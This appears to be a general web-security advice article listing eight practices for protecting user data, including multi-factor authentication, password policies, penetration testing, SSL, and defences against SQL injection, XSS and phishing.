Data is widely acclaimed as the new oil. An increasing amount of data is being kept online, and many traditional assets are becoming digitized. It is more important than ever to adhere to security principals and employ the latest security techniques.
Cybercrime has been increasing drastically, and security administrators are overwhelmed against an onslaught of new and creative types of cybercrime. Equifax is the latest of a long string of data breaches with extensive consequences.
It only takes one hack on one account to take down an entire network. Once the hackers are in, it is usually game over. But by following some of the most important protocols, you can ensure that your users’ data is as safe as it can be.
#1 Enforce Multi-factor Authentication
Multi-factor authentication (MFA) is one of the best defenses available. Anybody logging onto a website or database will need to verify their identity by several (usually 2 or 3) different means. In general, these means or factors are classified into 3 groups:
- Knowledge factors: something that the user knows such as a login, password, or PIN.
- Possession factors: something that the user has such as a token or device.
- Inherent factors: something that the user IS, his or her biometric factors (iris, fingerprints, voice, or face recognition).
Each factor employed reduces the possibility of a security breach building one more barrier on the hacker’s track. Biometric authentication factors are considered the most reliable. Based on machine learning models trained to recognize the user’s voice or appearance, they are extremely hard to hack with the use of software only. However, they are vulnerable to social engineering attacks, which means that other factors cannot be neglected either to ensure the all-round security of a system.
#2 – Password Management
After MFA, password management is the next priority. A frightening number of users still use the most basic and common passwords, such as “password” or “username123.” Allowed passwords should be longer than 22 characters with a mix of numbers, letters, and non-alphanumeric symbols. A mix of upper and lower case characters is also desirable.
Additionally, there should be a limited number of login attempts allowed, from 3 to 5 on average, followed by a waiting period or an additional verification method. Encourage all employees or users to make use of password vaults. Though they are not infallible, they are highly recommended by security experts, as they are superior to trying to manually keep track of all passwords.
All stored passwords should be encrypted and salted. This will mean that when you are validating users, you are only ever comparing encrypted values. Salting the password means that it is very expensive to crack them.
3# – Test, Test, Test
MFA and a strong password management system are essential to protect user data. But if you have access to a large amount of sensitive data, then it will not be enough. The next step is to perform penetration testing with regard to the security of the site or database itself
Hackers are getting more creative and there are many ways to crack a website. A site should be regularly tested to see how strong it is using real-time stress tests. A professional team can emulate what hackers would theoretically do. Any serious business with sensitive data should be performing regular penetration tests every 3 or 6 months.
#4 – Secure Sockets Layer (SSL)
This is something that all sites should have, especially those that use forms. Sites without SSL are flagged on Chrome, and statistics show that 85% of US Chrome users will leave a non-SSL site, so its absence will also affect a company’s web traffic seriously. SSL is also a ranking signal in Google’s search algorithms. There are different types of SSL certificates, ranging from free to $200 a month. In 2019, every site should have SSL where possible for both security and business purposes.
#5 – Protect Against SQL Injection
SQL injection occurs where an attacker inserts some SQL into a web form or into the URL. The SQL in the URL or web form acts as a query sent directly to the database. So the hackers will see the result on their screens. This can be prevented by using parameterized queries.
#6 – Protect Against Cross Site Scripting (XSS)
Cross Site Scripting is another common technique, and it a little more difficult to troubleshoot than SQL injection. This is because practically all sites are using JavaScript right now. It is very important to make sure that users are not able to inject JavaScript into your pages. Otherwise, the malicious JavaScript could run in the browser of every other user who visits the site. To combat this, use a Content Security Policy, which limits the type and amount of JavaScript that can be used on the site.
#7 – Social Engineering
Social engineering remains one of the most dominant types of hack, where hackers gain information from users or employees. The most common type of a social engineering attack is phishing. For example, a link might be given to an employee to a particular site via email. The site might look official but be a fake, taking the username and password for the actual site. Criminals will often impersonate companies in emails or via phone and convince people to divulge sensitive information. Make sure all employees and users are informed about these tricks. They work time and time again despite numerous warnings never to give sensitive information away via email or telephone.
#8 – Additional Tips
- Update all Software – It is best practice to make sure that all plugins, extensions, and applications are updated to the latest version. Hackers look for security vulnerabilities in older versions of the software.
- Use a CDN – It is also advisable to use a content delivery network (CDN). This will prevent the commonly distributed denial of service attack (DDoS) which floods the server with requests. A CDN will scale to handle this problem as the traffic increases.
- Disallow file uploads – Never allow users to upload files where possible. Any uploaded file has the potential to run malicious code when executed on the server.
Summing up
There are a number of methods that can be used to protect user data. The most important is to enforce MFA and a strong password for all users. This should deter most hackers. If you have sensitive data, then be sure to conduct penetration testing regularly to examine how secure your site actually is.
While MFA and password management are essential, your site could suffer from a basic security flaw that the specialists will pick up very quickly. No site or database is 100% secure and technology is constantly evolving. Individuals and businesses have to stay up to date with all the latest security protocols.
